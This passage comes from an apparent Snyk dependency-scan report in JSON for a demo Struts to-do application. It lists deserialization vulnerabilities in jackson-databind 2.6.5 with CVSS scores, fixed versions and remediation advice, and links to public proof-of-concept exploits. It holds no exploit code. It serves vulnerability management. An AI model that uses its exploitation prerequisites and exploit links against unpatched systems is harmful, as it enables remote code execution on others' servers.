"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + 
"isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this 
package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + 
"className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an 
incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + 
"level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": 
"https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). 
This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + 
{ + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). 
This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", 